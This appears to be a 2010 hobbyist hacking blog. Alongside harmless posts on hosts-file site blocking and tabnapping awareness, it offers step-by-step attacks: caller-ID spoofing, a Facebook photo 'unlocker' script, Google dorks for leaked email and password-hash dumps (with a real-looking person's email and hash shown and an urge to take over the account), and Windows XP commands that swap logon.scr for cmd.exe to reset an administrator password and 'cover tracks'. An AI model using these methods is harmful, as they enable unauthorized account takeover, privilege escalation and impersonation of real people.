hacking

hacking is my passion, if u wanna do some thing interesting u can visit here

My Blog List

just click to see

Your Ad Here

ur ip address is

Sign by Danasoft - Get Your Free Sign

Thursday, December 9, 2010

How-To block websites on your computer without use of any software?

There are commercially available softwares which will prevent access to websites you specify from your computer. But this can also be done on your computer without even spending a single penny.  We will show you how to do it absolutely for free:


1. Browse to C:\Windows\System32\drivers\etc.


2. Look for a file named as hosts, then open it with Notepad.


3. At the bottom of the file, add the line as shown below:


127.0.0.1 www.blockingsite1.com



www.blocksites1.com is an example of website URL which you would like to block, just replace it with the actual URL so that they are unaccessible to all. 


4. If you have more websites that would like to be blocked, just press Enter and repeat step 3 to add additional URL until all desired websites are added.


5. At the last line of the URL that you have entered, add an extra carriage return by pressing Enter.


6. Save and close the file.




Once you have completed above steps, all websites you have entered will be blocked with immediate effect. Hopefully this simple method will help you to prevent certain websites from being accessed by your kids or anybody else for any reason.

Wednesday, December 1, 2010

CALL SPOOFING

CODE:-

+960 9710488






Then wait for a beep after that dial the number you want to display in your friends number with the prefix 91 and then again wait for next beep, after that dial the number which you wanna call ... everything done, and call will get connected




THANKS

FACEBOOK PHOTO UNLOCKER

While surfing on net I juz got a JavaScript which unlock the photos of a profile who have LOCKED his photos or Photo Album......


Just copy the whole script to the URL bar and replace it with the URL of the profile that you wanna UNLOCK the photos......ant hit ENTER....


javascript:(function(){CSS.removeClass(document.body,%20'profile_two_columns');tab_controller.changePage("photos");})()




THANKS!!!!

Thursday, November 11, 2010

Grab Email Accounts Using Google For Noobs

1: Put one of these dorks in google search and hit enter..... 

Code:
Code:
ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e

Code:
ext:sql intext:"INSERT INTO" intext:@hotmail.com  intext:password
Code:
ext:sql intext:@hotmail.com  intext:password

2:Now you will see something like this...



3: Select one of displayed pages,as you see we now have a bunch of email accounts+ hashes 

 


4:NOW Select a account you want....but be sensible ....while selecting... 


I selected a random account.... 

The email of account is : narendra97@gmail.com
And for the password ..you have to crack the hash....as one below........

d2491b289b6be1fd0bb0c8d60 e053d3d 

Now you can crack the above hash by going to 


Code:

5: What are you reading now ?......go and grab the account....

Mobile hack to call your friends.Funny isn't It

Hello Friends I am sahring With you a extremely Nice Prank or you can simply say Hack


i.e "How To Call Your Friends From THeir Own Cell Number".

 Enjoy and Have Fun And GO on Reading..

1. Go to http://www.mobivox.com and register there for free account.

2. During registration, remember to insert Victim mobile number in "Phone number" field as shown below.

3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall".


4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.


5. That's it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.


If you are facing Any Problem Ask me I am there to help you Out . Enjoy and have Fun.

Saturday, October 23, 2010

Beware Of Tab Napping: New Phishing Technique

As people were becoming more and more aware of these traditional phishing techniques and it was becoming difficult for the scammers to cheat people using these phishing techniques so they invented a new technique called “Tab Napping”.This is one of the most intelligent and wise methods of phishing and it not easily detected by a normal internet user until and unless he is aware of this phishing technique.

                                    What is Tab Napping?

Tab napping is new type of phising scam that does not require you to click on any url to redirect you to the phishing site instead it relies on the fact that a lot of people used tabbed browsing(Opening multiple tabs while browsing).In tab napping one of your inactive tab is automatically replaced by with a new tab without your knowlege.For example one of your inactive tab in which you have opened your bank’s website will be automatically replaced with the phishing site of your bank and you will be asked to enter your username and password.You might think you have been signed out or never logged in but when you will enter the details again it will be sent to the scammer.

How To Detect And Protect Yourself From Tab Napping

Here are the simple and easy steps with which you can detect this new phishing technique “Tab Napping”.

1. Don’t open another tab when your are working with your banking site or any other secure businesswebsite instead open new windows using CTRL+N.
2. Always check the url address of the website if you return from another tab.(Fake page will have differentUrl)
3. Check that the url has secure address “https:// “ or a big green bar in front of the url in address bar which certifies that it is secure and certified website.
4. If you find anything suspicious close the tab and type and open the website in new Tab.

Saturday, October 16, 2010

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.


Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks